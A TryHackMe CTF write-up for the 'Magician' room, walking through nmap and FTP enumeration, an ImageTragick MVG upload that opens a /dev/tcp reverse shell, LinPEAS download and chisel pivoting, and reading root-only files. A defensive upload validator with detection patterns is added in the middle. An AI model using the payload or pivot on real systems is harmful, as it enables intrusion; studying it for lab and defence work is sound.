Magician-TryHackMe

Magician-THM

This is a write-up for TryHackMe's room named Magician. The description of the room says: "This magical website lets you convert image file formats." The room can be found at:

https://tryhackme.com/room/magician

Make an entry in /etc/hosts first for "magician" as mentioned in the room. Now let's start our enumeration process with nmap.

Enumeration

NMAP

nmap -sC -sV 10.10.148.85

┌──(kali㉿kali)-[/tmp]
└─$ nmap -sC -sV 10.10.148.85
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-22 09:05 EST
Nmap scan report for 10.10.148.85
Host is up (0.023s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
8080/tcp open http-proxy
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404
| Vary: Origin
| Vary: Access-Control-Request-Method
| Vary: Access-Control-Request-Headers
| Content-Type: application/json
| Date: Mon, 22 Feb 2021 14:07:04 GMT
| Connection: close
| {"timestamp":"2021-02-22T14:07:05.669+0000","status":404,"error":"Not Found","message":"No message available","path":"/nice%20ports%2C/Tri%6Eity.txt%2ebak"}
| GetRequest:
| HTTP/1.1 404
| Vary: Origin
| Vary: Access-Control-Request-Method
| Vary: Access-Control-Request-Headers
| Content-Type: application/json
| Date: Mon, 22 Feb 2021 14:07:04 GMT
| Connection: close
| {"timestamp":"2021-02-22T14:07:04.814+0000","status":404,"error":"Not Found","message":"No message available","path":"/"}
| HTTPOptions:
| HTTP/1.1 404
| Vary: Origin
| Vary: Access-Control-Request-Method
| Vary: Access-Control-Request-Headers
| Content-Type: application/json
| Date: Mon, 22 Feb 2021 14:07:04 GMT
| Connection: close
| {"timestamp":"2021-02-22T14:07:05.051+0000","status":404,"error":"Not Found","message":"No message available","path":"/"}
| RTSPRequest:
| HTTP/1.1 505
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 465
| Date: Mon, 22 Feb 2021 14:07:04 GMT
| <!doctype html><html lang="en"><head><title>HTTP Status 505
| HTTP Version Not Supported</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 505
|_ HTTP Version Not Supported</h1></body></html>
|_http-title: Site doesn't have a title (application/json).
8081/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: magician

So the FTP port and two web ports, 8080 and 8081, are open. Let's explore the FTP port first.

FTP

Trying anonymous access and waiting (well, almost forgetting in my case :)) gave us this hint:

┌──(kali㉿kali)-[/tmp]
└─$ ftp magician
Connected to magician.
220 THE MAGIC DOOR
Name (magician:kali): anonymous
331 Please specify the password.
Password:
230-Huh? The door just opens after some time? You're quite the patient one, aren't ya, it's a thing called 'delay_successful_login' in /etc/vsftpd.conf ;) Since you're a rookie, this might help you to get started: https://imagetragick.com. You might need to do some little tweaks though...
230 Login successful.
ftp>

So https://imagetragick.com/ indicates that we have CVE-2016-3714 (ImageTragick) somewhere, but where? Let's explore our identified web ports.

Port 8080

[Screenshot: port 8080]

This doesn't reveal anything, so let's move on and keep this port in mind.

Port 8081

[Screenshot: port 8081]

As shown on the web page, we can convert PNG to JPG, which is what the software ImageMagick does. Together with the FTP hint, this tells us that the ImageMagick behind this converter has the ImageTragick vulnerability, which can lead to RCE.

Exploit

Searching for an ImageMagick exploit, I found this payload in PayloadsAllTheThings:

push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/IP/9999 0<&1 2>&1'
pop graphic-context
pop graphic-context

Saved this payload as shell.png (with IP replaced by the attacking machine's address), started a netcat listener on port 9999 and uploaded the PNG file to the website:

[Screenshot: reverse shell]

We got our reverse shell and the user's flag in the /home/magician directory.
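From the defender's side, the converter accepted a text file (MVG) because it trusted the .png extension. The following added check (my code, not part of the room or the original write-up) verifies the magic bytes against the declared type and scans for the ImageTragick markers that imagetragick.com describes; the sample inputs are constructed here, with the attacker address replaced by a placeholder.

```python
"""
Upload validation against the ImageTragick (CVE-2016-3714) trick used above:
a "PNG" that is really an MVG text file whose `image` directive carries a
shell command. Sample inputs below are constructed for demonstration.
"""
import re

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
JPEG_MAGIC = b"\xff\xd8\xff"

# Text-based ImageMagick inputs that should never arrive through a raster
# upload form; any of these in a file claimed to be PNG is the tell.
MVG_MARKERS = (b"push graphic-context", b"viewbox", b"<svg")
# Delegate/shell injection: a quoted filename that starts with a pipe, or the
# url()/ephemeral:/msl:/label:@/text:@ coder prefixes listed on imagetragick.com.
INJECTION_RE = re.compile(
    rb"""['"]\|[^'"]*['"]|url\(|ephemeral:|msl:|label:@|text:@""", re.IGNORECASE
)

def claimed_type_matches(data: bytes, declared_ext: str) -> bool:
    """True only when the file's magic bytes agree with the declared extension."""
    ext = declared_ext.lower().lstrip(".")
    if ext == "png":
        return data.startswith(PNG_MAGIC)
    if ext in ("jpg", "jpeg"):
        return data.startswith(JPEG_MAGIC)
    return False

def imagetragick_indicators(data: bytes) -> list:
    """Return the suspicious markers found in an upload (empty list == clean)."""
    head = data[:4096]  # payloads of this kind sit at the very start of the file
    found = [m.decode() for m in MVG_MARKERS if m in head]
    found += [m.group(0).decode(errors="replace") for m in INJECTION_RE.finditer(head)]
    return found

def accept_upload(data: bytes, declared_ext: str) -> bool:
    """Accept only a genuine raster image of the declared type with no MVG/delegate markers."""
    return claimed_type_matches(data, declared_ext) and not imagetragick_indicators(data)

# Constructed samples: the write-up's payload shape (address replaced by a
# placeholder) and a minimal genuine PNG header.
MVG_SAMPLE = (b"push graphic-context\nviewbox 0 0 1 1\n"
              b"image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ATTACKER_IP/9999 0<&1 2>&1'\n"
              b"pop graphic-context\n")
PNG_SAMPLE = PNG_MAGIC + b"\x00\x00\x00\rIHDR" + b"\x00" * 13

if __name__ == "__main__":
    print("MVG payload accepted?", accept_upload(MVG_SAMPLE, "png"))  # False
    print("Real PNG accepted?   ", accept_upload(PNG_SAMPLE, "png"))  # True
```

The magic-byte check alone would have blocked the upload in this room; the marker scan is there so that a misconfigured MIME/extension mapping still gets caught and logged.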

Stabilize Shell

Upgrade and stabilize our shell to a more usable one by running the following commands:

/usr/bin/script -qc /bin/bash /dev/null
Ctrl+Z to background the shell
stty raw -echo
fg
export TERM=xterm

Privilege Escalation

Transfer LinPEAS to the target and run it with the following commands:

On Kali, in the directory where linpeas.sh is copied:

python3 -m http.server

On Target:

wget http://10.8.98.192:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

[Screenshot: linpeas.sh output]

A service is running on port 6666, bound to localhost only. Let's try to pivot to this internal port.

Pivoting

We will use Chisel to do the pivoting. This useful tool can be found here: https://github.com/jpillora/chisel
Compile it by following the instructions given and transfer it onto the target.
Run the following on the attacking Kali machine:

./chisel server -p 9000 --reverse -v

[Screenshot: chisel as server on Kali]

Run the following command on the target:

./chisel client 10.8.98.192:9000 R:10.8.98.192:7777:127.0.0.1:6666

[Screenshot: chisel as client on target]

Here chisel, running as a client, connects to the server (chisel running on the Kali machine on port 9000) and, with the 'R' (reverse) option, forwards traffic arriving at the Kali machine (10.8.98.192 in my case) on port 7777 to the internal port 6666 on the target machine.

Accessing http://10.8.98.192:7777 on the Kali machine, we got:

So we have a web page that asks us for file names. I tried reading a few files like /etc/passwd and /etc/hosts and was able to read them. Maybe we can read files that only root can read, so I tried reading /etc/shadow and got some output which looks to be encoded. Why not try to read the root flag itself?

And indeed we can, and we got a base64-encoded string. Decoding it gives us the root flag:

That's it. See you in the next write-up.

0xsanz
Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900